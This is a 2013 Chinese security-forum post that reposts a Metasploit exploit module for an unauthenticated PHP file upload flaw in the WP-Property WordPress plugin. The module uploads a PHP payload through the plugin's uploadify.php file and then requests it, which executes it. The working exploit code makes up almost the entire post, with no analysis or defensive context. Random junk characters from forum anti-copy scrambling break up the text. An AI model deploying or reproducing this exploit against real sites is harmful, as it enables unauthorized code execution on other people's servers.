找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2292|回复: 0
打印 上一主题 下一主题

WordPress WP-Property PHP 文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-4 19:51:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
WordPress WP-Property PHP 文件上传漏洞. Q/ W& a: G2 W9 |1 w1 n
1 z3 A% `4 V+ v) s1 X: m2 z1 |
## # This file is part of the Metasploit Framework and may be subject to5 V" f1 n/ ^) _+ y9 I% }0 C: n

& Z) y3 M' b$ B7 g+ C0 X, \# redistribution and commercial restrictions. Please see the Metasploit
; x6 q8 }( \2 O; c( |
* O: J" N; q0 A1 ^% e6 @# Framework web site for more information on licensing and terms of use.
) s/ B" t6 J* q
1 w# _! ?  B% o# m& w0 ?#   http://metasploit.com/framework/ ##
+ e2 P: y, y0 P0 d1 [) B9 W! l2 p4 r9 |

4 N/ A" M: n/ @( |& Q0 ^) w( |, u5 t& W5 x" z

3 }8 }: H; n- b5 z! Q
: R+ c: N3 f: Y* O0 P' b4 M$ Vrequire 'msf/core'
8 _" k. E% g' U: f% a4 q+ G& brequire 'msf/core/exploit/php_exe'
0 u- o) R+ ], @" ?/ p" }* o9 |# R+ G/ B2 g8 E6 {
class Metasploit3 < Msf::Exploit::Remote     Rank = ExcellentRanking       include Msf::Exploit::Remote::HttpClient     include Msf::Exploit:hpEXE       def initialize(info = {})         super(update_info(info,             'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
, |2 G, @8 D/ u& r& F, R. r'Description'    => %q{& J# ?) [$ p5 i+ V. b; \
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress                 plugin. By abusing the uploadify.php file, a malicious user can upload a file to a                 temp directory without authentication, which results in arbitrary code execution.             },             'Author'         =>0 q: f  @; h/ |3 i6 t
[
6 X  y1 Q- ~0 }% \; I* r' l$ P  P'Sammy FORGIT', # initial discovery
0 \. J4 r# T$ `  F4 a2 ?'James Fitts <fitts.james[at]gmail.com>' # metasploit module: |5 ^  P! ~1 a' R6 R# g
],
0 [4 O6 l- A8 \) e. _'License'        => MSF_LICENSE,7 H9 X3 W2 d& X( l- q7 a
'References'     =>
  F* d& N5 S: V% V[
; b9 n+ F0 Q3 a& q[ 'OSVDB', '82656' ],! y6 j* g9 r: V# R  V9 _- b
[ 'BID', '53787' ],2 q( N9 e2 N% e
[ 'EDB', '18987'],
( g2 H3 K. F- ~: A0 z[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]9 k+ s3 i& g0 }/ j# G# [) \
],
& G% c( z( j- f2 Z'Payload'        =>6 |3 S* e. y  J3 G8 o: x" F4 L
{
% R% Z5 M( r  a$ k) [! y* Y+ p1 ^'BadChars' => "\x00",! ]! M, j# y2 x2 a2 J
},+ Q% e' n, ~& q
'Platform'       => 'php',
+ G) K! t) f/ A1 c2 B'Arch'           => ARCH_PHP,2 ?/ p" L- ^, M; k9 W# u+ l$ z
'Targets'        =>/ G" Q5 f3 A- s; [& H) S
[- ]4 e; h: U5 {' Z3 w8 J0 B
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],  r! _9 H: \: ^5 d/ U
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]2 _2 v; u& A, L5 B' R
],
( r  z2 Z4 y& B0 F6 R. ['DefaultTarget'  => 0,
* R8 h" J; W2 d0 i7 i8 F'DisclosureDate' => 'Mar 26 2012'))* |' V  m- K8 i9 z( y3 b# N

' }1 e: j9 X2 |7 aregister_options(
9 B2 y' d+ o8 x/ T" v; z7 k4 C[/ G1 O  h% K8 G6 p0 R: E/ r
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
! a2 i# j0 i) |; }! X], self.class)% a# u3 ^" M, P* v0 C" P4 r
end% E8 W( W3 j+ Q, d

0 \, o  v/ `5 K+ r* L. Xdef check$ D" ~* G: W8 c1 r2 X
uri =  target_uri.path( ^1 y. v6 P; ^' m4 [1 Y
uri << '/' if uri[-1,1] != '/'           res = send_request_cgi({             'method' => 'GET',
% Z! L& a6 `& A% u; I; C'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"8 y* a) e% m" A
})& ^  O! _0 E5 I9 |1 Z% Z

; c( _9 v# o. W3 x/ K$ Qif not res or res.code != 200, u% i, b8 ^, F  r
return Exploit::CheckCode::Unknown$ \3 s. l3 I+ S2 |
end
: l/ r" i1 w& g3 ^" ]5 ?: x' N+ ~, f- ~+ P( p6 r4 G, y* E
return Exploit::CheckCode::Appears9 k  }: v$ U5 P6 w! Q4 W4 ?
end6 c. @5 n1 V$ {( H5 H* h" x* d

0 L6 _+ [7 W* I. W$ mdef exploit" \7 {1 }6 Q/ H2 j
uri =  target_uri.path
! v5 e& y% Q4 }2 ^. M# Yuri << '/' if uri[-1,1] != '/'           peer = "#{rhost}:#{rport}"           @payload_name = "#{rand_text_alpha(5)}.php"         php_payload = get_write_exec_payload(:unlink_self=>true)
% _9 L6 N& Y/ M2 l5 }- t: @  \6 r! [# i  L/ |* z1 D
data = Rex::MIME::Message.new
7 y0 J7 h' B+ {: t. Xdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
1 L4 d! l" D) J1 [0 E$ x; k# k& \data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")% x% d9 ^/ d+ |, {) h9 A4 y
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
$ \; ]4 O% m9 O8 ^. k2 g, C5 y4 ^+ G: d
print_status("#{peer} - Uploading payload #{@payload_name}")2 @6 Y0 E  H, p  \8 X- v
res = send_request_cgi({6 f3 A& K4 v# t9 D0 w1 G0 ^  g
'method' => 'POST',9 d! P% e. [& I( r2 j: N) J% k
'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
9 @+ h7 A! x& h4 S/ L$ s' O'ctype'  => "multipart/form-data; boundary=#{data.bound}",
0 `' S/ n  ~4 ]# _  S2 B- ?'data'   => post_data2 J" \+ N" k1 r& q9 M! P8 E9 s4 X
})
( ?( ?) ], P1 E. ]+ l0 }( A; {. a; }+ N( M" ?2 F
if not res or res.code != 200 or res.body !~ /#{@payload_name}/- n5 M) r9 b) Z9 i1 a5 |+ s6 k
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")6 J( [+ }- d( y/ m
end
0 a8 n. \. r. t6 O8 O! [  b5 i
8 N5 ?/ t) g  y; \4 K& xupload_uri = res.body
! _5 l8 S5 @) u: F' V& |5 \5 A/ L$ P( ]
print_status("#{peer} - Executing payload #{@payload_name}")* B2 s; @$ R3 m+ f1 W
res = send_request_raw({
' O, ~4 V8 c% b% c5 r2 c# X5 v'uri'    => upload_uri,
7 {" W, U. n$ C. {; q( P'method' => 'GET'2 @! v3 Z- b9 o2 X) O* p! J
})  f: B" R. U0 b, _  j
end  M8 K2 W6 a3 T2 t3 B' U  k
end
/ s+ N# I( Z2 B. l  o4 s
4 O' b: {/ J1 f6 s不要问我这写的是什么 怎么利用 我是说msf.
- k0 V* l- L' d0 y- s
' V1 ~2 r; F- J* O/ F- u
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表